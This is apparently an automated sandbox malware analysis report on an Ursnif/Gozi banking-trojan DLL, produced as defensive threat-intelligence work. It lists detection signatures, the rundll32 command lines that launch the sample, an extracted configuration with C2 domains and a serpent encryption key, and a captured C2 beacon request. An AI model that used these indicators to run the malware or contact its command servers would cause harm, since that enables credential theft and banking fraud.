Play interactive tour

Edit tour

Analysis Report iJdlvBxhYu.dll

Overview

General Information

Sample Name:	iJdlvBxhYu.dll
Analysis ID:	404149
MD5:	18d613d02eaf8d339feebb21f578f329
SHA1:	01ea39853139ccfe82f0bd19f8963d3ccebf8e8a
SHA256:	bd43f7bc23a76b086a81b8e6fcd4355cac648d3f7d9a941d9aa259def534d5b1
Tags:	dllgeoGoziISFBITAUrsnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Ursnif

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6684 cmdline: loaddll32.exe 'C:\Users\user\Desktop\iJdlvBxhYu.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6692 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\iJdlvBxhYu.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6732 cmdline: rundll32.exe 'C:\Users\user\Desktop\iJdlvBxhYu.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6720 cmdline: rundll32.exe C:\Users\user\Desktop\iJdlvBxhYu.dll,Enterbeen MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6780 cmdline: rundll32.exe C:\Users\user\Desktop\iJdlvBxhYu.dll,Multiply MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 6728 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4876 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6728 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "KfAh1HjBYV5+GLf1H4+++WQcflLYE80sojTEX/uvXaLXhDxSfFOCIe7aHw1TYNxXIBvEkznlAveWMvLVTSjkgy/Hqpm47GUbXiPUxbpl0qoDhGQpz45mxRQlc+jgXQ4D03Y0gMF90NeOpBOEi497zfDlURi8Me7OHCSUNpn4Q0kQtrInhQlll9V6IFuYjZJB", "c2_domain": ["outlook.com/login", "gmail.com", "dorelunonu.us", "morelunonu.us"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.536297010.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.536331315.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.536410675.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.536390845.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.536247273.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.536484271.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.595047356.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.536426256.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.536360413.0000000005618000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 6732	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 5 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.2.rundll32.exe.4e994a0.2.raw.unpack

Malware Configuration Extractor: Ursnif {"RSA Public Key": "KfAh1HjBYV5+GLf1H4+++WQcflLYE80sojTEX/uvXaLXhDxSfFOCIe7aHw1TYNxXIBvEkznlAveWMvLVTSjkgy/Hqpm47GUbXiPUxbpl0qoDhGQpz45mxRQlc+jgXQ4D03Y0gMF90NeOpBOEi497zfDlURi8Me7OHCSUNpn4Q0kQtrInhQlll9V6IFuYjZJB", "c2_domain": ["outlook.com/login", "gmail.com", "dorelunonu.us", "morelunonu.us"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Source: iJdlvBxhYu.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: iJdlvBxhYu.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\364\Head\Fresh-Room\score_Several\turn.pdb source: loaddll32.exe, 00000000.00000002.593517225.000000006E16B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.598022464.000000006E16B000.00000002.00020000.sdmp, iJdlvBxhYu.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_0100896F RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

3_2_0100896F

Source: Joe Sandbox View

IP Address: 40.97.128.194 40.97.128.194

Source: global traffic

HTTP traffic detected: GET /login/greed/dTdjBCYANBp89r_2BxCJb/gK6KRSDvLFl65FiM/sVGCJkg_2FiGctf/t6MCq4h_2BQjlakLCK/wiH0Ze_2B/jucB0Ra6kWTVhbib9MO1/jbq6SBoLka4DWlxdGWZ/y4sF0OuALvDiDjUoj2_2B_/2FCnNAucowWTY/QocXWkvP/dNKrsXhuwJ0UrXUCqZRpNCx/r6rZ7E04g_/2B8ZRdIhu4yR4YZKp/tqA3A0JYvM/21FVchV.gfk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: outlook.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: outlook.com

Source: ~DF0D80EB75D4D79339.TMP.15.dr, {C4CF6A29-AD44-11EB-90E5-ECF4BB2D2496}.dat.15.dr

String found in binary or memory: https://outlook.office365.com/login/greed/dTdjBCYANBp89r_2BxCJb/gK6KRSDvLFl65FiM/sVGCJkg_2FiGctf/t6M

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.536297010.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536331315.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536410675.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536390845.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536247273.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536484271.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.595047356.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536426256.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536360413.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6732, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.536297010.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536331315.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536410675.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536390845.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536247273.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536484271.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.595047356.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536426256.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536360413.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6732, type: MEMORY

System Summary:

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1023A5 NtQueryVirtualMemory,	0_2_6E1023A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E10101B NtMapViewOfSection,	3_2_6E10101B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E10145E GetProcAddress,NtCreateSection,memset,	3_2_6E10145E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1023A5 NtQueryVirtualMemory,	3_2_6E1023A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01001724 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_01001724
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0100B301 NtQueryVirtualMemory,	3_2_0100B301

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E102184	0_2_6E102184
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E14AF51	0_2_6E14AF51
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E146700	0_2_6E146700
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E169DAE	0_2_6E169DAE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E163A47	0_2_6E163A47
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E167AB1	0_2_6E167AB1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E154B3B	0_2_6E154B3B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E16035D	0_2_6E16035D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1628C3	0_2_6E1628C3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E14C100	0_2_6E14C100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E102184	3_2_6E102184
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01003977	3_2_01003977
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01008045	3_2_01008045
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_010062D8	3_2_010062D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0100B0DC	3_2_0100B0DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E14AF51	3_2_6E14AF51
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E146700	3_2_6E146700
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E169DAE	3_2_6E169DAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E163A47	3_2_6E163A47
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E167AB1	3_2_6E167AB1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E154B3B	3_2_6E154B3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E16035D	3_2_6E16035D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1628C3	3_2_6E1628C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E14C100	3_2_6E14C100

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E14B2D0 appears 32 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E14B2D0 appears 32 times

Source: iJdlvBxhYu.dll

Binary or memory string: OriginalFilenameturn.dll8 vs iJdlvBxhYu.dll

Source: iJdlvBxhYu.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: iJdlvBxhYu.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal60.troj.winDLL@12/5@3/4

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_010024C7 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_010024C7

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C4CF6A27-AD44-11EB-90E5-ECF4BB2D2496}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF222070F69DD5E09D.TMP

Jump to behavior

Source: iJdlvBxhYu.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iJdlvBxhYu.dll,Enterbeen

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\iJdlvBxhYu.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\iJdlvBxhYu.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iJdlvBxhYu.dll,Enterbeen
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\iJdlvBxhYu.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iJdlvBxhYu.dll,Multiply
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6728 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\iJdlvBxhYu.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iJdlvBxhYu.dll,Enterbeen	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iJdlvBxhYu.dll,Multiply	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\iJdlvBxhYu.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6728 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: iJdlvBxhYu.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: iJdlvBxhYu.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: iJdlvBxhYu.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: iJdlvBxhYu.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: iJdlvBxhYu.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: iJdlvBxhYu.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: iJdlvBxhYu.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: iJdlvBxhYu.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: iJdlvBxhYu.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: iJdlvBxhYu.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: iJdlvBxhYu.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: iJdlvBxhYu.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: iJdlvBxhYu.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E10160D LoadLibraryA,GetProcAddress,

0_2_6E10160D

Source: iJdlvBxhYu.dll

Static PE information: real checksum: 0x8203c should be: 0x7fedb

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E102120 push ecx; ret	0_2_6E102129
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E102173 push ecx; ret	0_2_6E102183
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E11420E push es; ret	0_2_6E11420F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E11423B push ebx; ret	0_2_6E11424E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E14B315 push ecx; ret	0_2_6E14B328
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1143C5 push ebp; ret	0_2_6E1143CE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E18221D push eax; retf	0_2_6E182220
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E182BB6 push ecx; ret	0_2_6E182BD1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E102120 push ecx; ret	3_2_6E102129
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E102173 push ecx; ret	3_2_6E102183
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0100AD10 push ecx; ret	3_2_0100AD19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0100B0CB push ecx; ret	3_2_0100B0DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E11420E push es; ret	3_2_6E11420F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E11423B push ebx; ret	3_2_6E11424E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E14B315 push ecx; ret	3_2_6E14B328
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1143C5 push ebp; ret	3_2_6E1143CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E115842 push esp; ret	3_2_6E11588C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E18221D push eax; retf	3_2_6E182220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E182BB6 push ecx; ret	3_2_6E182BD1

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.536297010.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536331315.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536410675.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536390845.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536247273.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536484271.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.595047356.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536426256.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.536360413.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6732, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

3_2_0100896F

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E14C6CB _memset,IsDebuggerPresent,

0_2_6E14C6CB

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E152CFE ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,

0_2_6E152CFE

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E10160D LoadLibraryA,GetProcAddress,

0_2_6E10160D

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E181302 mov eax, dword ptr fs:[00000030h]	0_2_6E181302
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E181238 mov eax, dword ptr fs:[00000030h]	0_2_6E181238
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E180E3F push dword ptr fs:[00000030h]	0_2_6E180E3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E181302 mov eax, dword ptr fs:[00000030h]	3_2_6E181302
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E181238 mov eax, dword ptr fs:[00000030h]	3_2_6E181238
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E180E3F push dword ptr fs:[00000030h]	3_2_6E180E3F

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E14B830 GetProcessHeap,

0_2_6E14B830

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E151090 SetUnhandledExceptionFilter,	0_2_6E151090
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1510C1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E1510C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E151090 SetUnhandledExceptionFilter,	3_2_6E151090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E1510C1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6E1510C1

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\iJdlvBxhYu.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.592806107.0000000001490000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.593890848.0000000003640000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.592806107.0000000001490000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.593890848.0000000003640000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.592806107.0000000001490000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.593890848.0000000003640000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: loaddll32.exe, 00000000.00000002.592806107.0000000001490000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.593890848.0000000003640000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E14B84D cpuid

0_2_6E14B84D

Source: C:\Windows\System32\loaddll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6E16770D
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	0_2_6E1677BA
Source: C:\Windows\System32\loaddll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	0_2_6E1675E3
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E151A40
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E167292
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E151AC6
Source: C:\Windows\System32\loaddll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_6E1672EE
Source: C:\Windows\System32\loaddll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_6E16736B
Source: C:\Windows\System32\loaddll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	0_2_6E1673EE
